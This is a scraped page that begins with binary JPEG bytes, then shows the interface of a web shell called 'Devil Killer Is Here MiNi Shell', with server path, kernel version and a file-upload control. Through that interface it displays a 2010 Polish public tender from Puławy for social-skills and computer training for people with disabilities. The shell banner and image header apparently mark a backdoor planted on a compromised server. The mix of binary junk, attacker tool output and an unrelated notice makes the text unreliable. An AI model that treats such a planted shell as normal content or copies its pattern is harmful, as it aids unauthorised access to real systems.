JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100507/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100507/112937-N-2010.html

<p class="kh_header"><b>Puławy: zorganizowanie i przeprowadzenie szkoleń</b><br>
<b>Numer ogłoszenia: 112937 - 2010; data zamieszczenia: 07.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , al. Królewska 3, 24-100 Puławy, woj. lubelskie, tel. 81888 04 92, faks 81888 04 92.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcpr.pulawy.pl; www.efs-pcpr.pulawy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zorganizowanie i przeprowadzenie szkoleń.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia składa się z 2 części:
Część I - Trening kompetencji i umiejętności społecznych
Część II -Podstawy obsługi komputera i korzystania z internetu
Opis szczegółowy przedmiotu zamówienia części I -
Części I -Trening kompetencji i umiejętności społecznych
1.Przedmiotem zamówienia jest zorganizowanie treningu kompetencji i umiejętności    społecznych wraz z doradztwem zawodowym i terapią psychospołeczną podczas    7- dniowego wyjazdu dla 69 osób niepełnosprawnych z I i II grupą inwalidzką z chorobą psychiczną i upośledzeniem umysłowym oraz opiekunów osób niepełnosprawnych łącznie z zakwaterowaniem, ubezpieczeniem od następstw nieszczęśliwych wypadków, wyżywieniem, dowozem z Puław do miejsca zakwaterowania oraz z zapewnieniem powrotu.Uczestnicy w wyniku rekrutacji zostali podzieleni na 2 grupy wyjazdowe w zależności od terminu wyjazdu:I grupa wyjazdowa- 51 osób,II grupa wyjazdowa - 18 osób.2.Terminy realizacji zamówienia: 
dla I grupy wyjazdowej w okresie pomiędzy 19.07.2010r. - 31.07.2010r.,
dla  II grupy wyjazdowej w okresie pomiędzy 14.08.2010r. - 31.08.2010r.
3.Miejsce realizacji: Zamawiający zastrzega, aby miejscem realizacji zamówienia była jedna z niżej wymienionych lokalizacji:-  Zakopane lub miejscowość na terytorium Polski w okolicy do 25 km od Zakopanego, lub - miejscowość nadmorska położona pomiędzy Ustką a Krynicą Morską z uwzględnieniem miejscowości położonych na Półwyspie Helskim począwszy od Władysławowa do miasta Hel, z zastrzeżeniem że odległość ośrodka miejsca zakwaterowania uczestników od morza nie może przekraczać 2 km, lub- miejscowość na terenie Pojezierza Mazurskiego na obszarze jednej z niżej wymienionych gmin: Giżycko, Ryn, Kruklanki, Miłki, Wydminy - w powiecie giżyckim, Budry, Węgorzewo - w powiecie węgorzewskim, Ełk, Stare Juchy - w powiecie ełckim, Orzysz, Pisz, Ruciane-Nida -  w powiecie pilskim,Mikołajki, Mrągowo, Piecki w powiecie mrągowskim,
z zastrzeżeniem, że odległość ośrodka miejsca zakwaterowania uczestników od jeziora nie może przekraczać 1 km.
Dla dwóch grup wyjazdowych Trening kompetencji i umiejętności społecznych ma odbywać się w tej samej miejscowości.
4.Wymagalny minimalny zakres tematyczny: Trening kompetencji i umiejętności społecznych ma zawierać w zależności od rodzaju zajęć zagadnienia tematyczne z poniższego zakresu:a.trening kompetencji i umiejętności społecznych:-trening autoprezentacji,-trening asertywności,-odkrywanie swoich mocnych stron i zasobów osobistych,-wzmocnienie samooceny i poczucia własnej wartości;b.doradztwo zawodowe- przeprowadzenie rozmowy wstępnej- przygotowanie CV;c.	
terapia psychospołeczna - zajęcia integracyjne w sali i w plenerze,- zajęcia z muzykoterapii.
5.Sposób prowadzenia szkolenia oraz czas trwania:Zajęcia muszą być zrealizowane poprzez warsztaty grupowe.Każda z grup wyjazdowych zostanie podzielona na grupy szkoleniowe w następujący sposób:I grupa wyjazdowa - 3 grupy szkoleniowe: jedna grupa 19-osobowa i 2 grupy 16-osobowe,II grupa wyjazdowa - 2 grupy szkoleniowe 9-osobowe.Czas trwania poszczególnych zajęć:a)trening kompetencji i umiejętności społecznych-Czas trwania zajęć to łącznie 60 godzin, czyli po 12 godzin lekcyjnych na każdą grupę szkoleniową, przy czym 1 godzina zajęć to 45 minut dydaktycznych.
b)doradztwo zawodowe-Czas trwania zajęć to łącznie 10 godzin, czyli po 2 godziny lekcyjne na każdą grupę szkoleniową, przy czym 1 godzina lekcyjna to 45 minut dydaktycznych,c)	terapia psychospołeczna-Czas trwania zajęć to łącznie 100 godzin, czyli po 20 godzin lekcyjnych na każdą grupę szkoleniową, przy czym 1 godzina lekcyjna to 45 minut dydaktycznych. 6.Wymagane minimalne kwalifikacje kadry, która będzie prowadziła poszczególne zajęcia:a.	trening kompetencji i umiejętności społecznych-wykształcenie wyższe psychologiczne,b.	doradztwo zawodowe-
wykształcenie wyższe z uprawnieniami doradcy zawodowego, c.terapia psychospołeczna-wykształcenie wyższe psychologiczne lub wyższe pedagogiczne na  kierunku pedagogika specjalna lub pedagogika terapeutyczna; 
7.Inne wymagania:
1. Wykonawca powinien zapewnić oraz wliczyć w koszt treningu także: a) transport autokarowy uczestników z Puław do miejsca zakwaterowania oraz przywóz uczestników do Puław, autokar wyposażony ma być w klimatyzację,b) transport w przypadku gdy odległość od miejsca zakwaterowania do miejsca, w którym odbywać się będą zajęcia przekracza 1 km,c) suchy prowiant na czas powrotu,d) pełne wyżywienie (3 posiłki dziennie tj. śniadanie, obiad, kolacja) dla wszystkich  uczestników, e)  bazę noclegową: zakwaterowanie uczestników w domu wczasowym, pensjonacie lub hotelu w jednym budynku lub w dwóch położonych obok siebie,zakwaterowanie uczestników w pokojach 2, 3 - osobowych, tj.:dla I grupy wyjazdowej - 18 pokoi 2- osobowych i 5 pokoi 3-osobowych,dla II grupy wyjazdowej - 3 pokoje 2- osobowe i 4 pokoje 3 - osobowe,wszystkie pokoje mają być z pełnym węzłem sanitarnym ( łazienka i toaleta) oraz wyposażone w czajnik elektryczny, szklanki po 1 na uczestnika, oraz po 1 litrze dziennie wody mineralnej na uczestnika; f)  opłatę klimatyczną, miejscową i inną związaną z pobytem uczestników za cały okres pobytu za wszystkich uczestników, jeśli jest wymagana;
g)  materiały dydaktyczne/szkoleniowe  dla   każdego   uczestnika   niezbędne    do
realizacji, zajęć  oraz  materiały  biurowe  dla  każdego uczestnika tj. po                 1 notatniku A-4 i po 1 długopisie, które po zakończeniu szkolenia stają się własnością uczestników;Wszystkie materiały wydane uczestnikom winny być oznaczone logotypem Powiatowego Centrum Pomocy Rodzinie w Puławach, UE, Europejskiego Funduszu Społecznego i PO KL, zgodnie z obowiązującymi Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki  oraz informacją : Projekt systemowy  Samodzielni - nie sami współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego,; h)  serwis kawowy w trakcie trwania zajęć dla każdego uczestnika (kawa, herbata, napoje, cukier, ciastka, śmietanka do kawy, owoce),
i) ubezpieczenie uczestników od następstw nieszczęśliwych wypadków na czas wyjazdu ( tj. od wyjazdu z Puław do powrotu do Puław), j) 3 opiekunów (koordynatorów) poszczególnych grup wyjazdowych na czas całego wyjazdu (łącznie z podróżą),, tzn.:-  dla I grupy wyjazdowej - 2 opiekunów, - dla II grupy wyjazdowej - 1 opiekuna,Do zadań opiekuna (koordynatora) wyjazdu należeć ma m.in. nadzór nad prawidłową realizacją harmonogramu wyjazdu i programu zajęć/szkolenia, nadzór nad zaopatrzeniem uczestników w apteczkę pierwszej pomocy, zapoznanie uczestników z zasadami bezpieczeństwa oraz zapewnienie warunków do ich przestrzegania, nadzór nad prowadzeniem dokumentacji;i) dostęp do opieki medycznej,j) sale szkoleniowe wyposażone w sprzęt niezbędny do przeprowadzenia danych zajęć, w szczególności w stoły, krzesła, tablicę, ekran projekcyjny
2.Uczestnicy otrzymają zaświadczenie o uczestnictwie odrębne dla rodzaju zajęć, o  które mają być oznaczone logotypem Powiatowego Centrum Pomocy Rodzinie w Puławach, UE, Europejskiego Funduszu Społecznego i PO KL, zgodnie z obowiązującymi Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki oraz informacją Projekt systemowy - Samodzielni - nie sami  współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego,
Opis szczegółowy przedmiotu zamówienia części II - Podstawy obsługi komputera i korzystania z internetu
1.Przedmiotem zamówienia jest zorganizowanie szkolenia z podstawowej obsługi komputera i korzystania z internetu dla 49 uczestników programu tj. osób niepełnosprawnych z I i II grupą inwalidzką z chorobą psychiczną i upośledzeniem umysłowym.Uczestnicy zostali podzieleni na 6 grup, tj: 2 grupy po 10 osób, jedna 6-osobowa grupa, jedna 7-osobowa grupa i 2 grupy po  8 osób.;2.Termin realizacji zamówienia:w okresie pomiędzy 10.09.2010r. - 31.10.2010r.;3.Miejsce realizacji: - na terenie miasta Nałęczów - dla dwóch grup, tj. jednej 6-osobowej i jednej  7- osobowej, i - na terenie miasta Puławy - dla czterech grup, tj. dwóch grup po 10 osób i 2 grup po 8 osób.;4.Wymagalny minimalny zakres tematyczny: Poziom szkolenia ma być dostosowany do możliwości uczestników z upośledzeniem umysłowym i chorobą psychiczną. Szkolenie ma zawierać zagadnienia z podstawowej obsługi komputera i korzystania z internetu. Zakłada się, że uczestnik szkolenia nabędzie minimum wiedzy z zakresu:-  zapoznania się ze sprzętem komputerowym,
- podstawową obsługą programu MS Word tj. elementami programu i zasadami pracy w nim obowiązującymi (m.in. tworzenie, zapisywanie i zamykanie dokumentów, kopiowanie i przenoszenie dokumentów),- założenia konta poczty elektronicznej i jego obsługa,- wyszukiwania w internecie różnych informacji;5.Sposób prowadzenia szkolenia oraz czas trwania:Szkolenie ma być prowadzone w formie warsztatów grupowych.Na każdą grupę uczestników przypadać ma po 12 godzin zajęć, przy czym 1 godzina to 45 minut. Łącznie na 6 grup uczestników przypadać ma 72 godziny zajęć.Zajęcia mają odbywać się dwa razy w tygodniu i trwać 2 godziny. Szkolenie jednej grupy ma odbyć się w okresie trzech tygodni. Zajęcia mają odbywać się od poniedziałku do piątku z wyjątkiem dni świątecznych, w godzinach pomiędzy 14:00 a 16:00.;6.Wymagane minimalne kwalifikacje kadry, która będzie prowadziła zajęcia: Wykształcenie co najmniej średnie z zakresu informatyki z przygotowaniem pedagogicznym bądź co najmniej 2-letnim doświadczeniem w prowadzeniu szkoleń z zakresu obsługi komputera. Przez doświadczenie, o którym mowa należy rozumieć pozostawanie w stosunku pracy lub zlecenia z firmą bądź instytucją prowadzącą tego typu szkolenia, kursy. 7.	Inne wymagania:a)wykonawca zapewnić ma wszystkim uczestnikom szkolenia ubezpieczenie od następstw nieszczęśliwych wypadków na czas trwania szkolenia,b)sale szkoleniowe mają być wyposażone w stanowiska komputerowe wraz z dostępem do internetu,  dla każdego uczestnika danej grupy podczas szkolenia;c)wykonawca zapewnić ma dla każdego uczestnika materiały szkoleniowe niezbędne do realizacji zajęć oraz materiały biurowe dla każdego uczestnika tj.po 1 notatniku A-4 i po 1 długopisie, które po zakończeniu szkolenia staną się własnością uczestników;Wszystkie materiały wydane uczestnikom mają być oznaczone logotypem Powiatowego Centrum Pomocy Rodzinie w Puławach, UE, Europejskiego Funduszu Społecznego i PO KL, zgodnie z obowiązującymi Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki oraz informacją: Projekt systemowy Samodzielni - nie sami współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, otrzymają zaświadczenie o ukończeniu szkolenia, które ma być oznaczone logotypem Powiatowego Centrum Pomocy Rodzinie w Puławach, UE, Europejskiego Funduszu Społecznego i PO KL, zgodnie z obowiązującymi Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki oraz informacją:Projekt systemowy Samodzielni - nie sami współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-9, 80.53.30.00-9, 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu prowadzona będzie w oparciu o złożone przez wykonawcę oświadczenia i dokumenty na zasadzie:spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu prowadzona będzie w oparciu o złożone przez wykonawcę oświadczenia i dokumenty na zasadzie:spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu prowadzona będzie w oparciu o złożone przez wykonawcę oświadczenia i dokumenty na zasadzie:spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu prowadzona będzie w oparciu o złożone przez wykonawcę oświadczenia i dokumenty na zasadzie:spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu prowadzona będzie w oparciu o złożone przez wykonawcę oświadczenia i dokumenty na zasadzie:spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- aktualne zaświadczenie o wpisie do rejestru instytucji szkoleniowych prowadzonego przez właściwy ze względu na siedzibę instytucji szkoleniowej Wojewódzki Urząd Pracy,
- program szkolenia i odpowiednio harmonogram wyjazdu
- w przypadku ustanowienia pełnomocnika - pełnomocnictwo do reprezentowania wykonawcy, z którego musi jednoznacznie wynikać do jakich czynności prawnych dana osoba została umocowana</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy polegające na:
- zmianie terminu zakończenia zamówienia spowodowanej warunkami atmosferycznymi - w przypadku klęski żywiołowej lub gdy warunki atmosferyczne uniemożliwiają wykonanie zamówienia w terminie wynikającym z oferty,
- zmianie spowodowanej wystąpieniem siły wyższej, czyli zdarzenia którego strony nie mogły przewidzieć i któremu nie mogły zapobiec, ani któremu nie mogą przeciwdziałać, a które uniemożliwią Wykonawcy wykonanie w części lub w całości jego zobowiązań,
-zmianie warunków płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych Instytucji Wdrażającej dotyczących realizacji projektu,
-zmianie osób upoważnionych do współpracy w sprawach związanych z wykonaniem umowy, o których mowa w § 8 umowy,
-za zgodą Zamawiającego zmianie osób, przy pomocy których Wykonawca realizować będzie zamówienie, wynikającej z ważnych przyczyn, które nie mogły być wcześniej przewidziane, z zastrzeżeniem, że proponowane przez Wykonawcę osoby będą spełniały warunki określone w Specyfikacji Istotnych Warunków Zamówienia;  zmiana taka nie wymaga aneksu do umowy;
-zmianie, w przypadku wystąpienia innych nieprzewidzianych okoliczności mających wpływ na możliwość wykonania umowy( np. żałoba narodowa)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcpr_pul@o2.pl, www.efs-pcpr.pulawy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie, Al. Królewska 19, 24-100 Puławy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.05.2010 godzina 08:00, miejsce: Powiatowe Centrum Pomocy Rodzinie
Al. Królewska 3
24-100 Puławy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




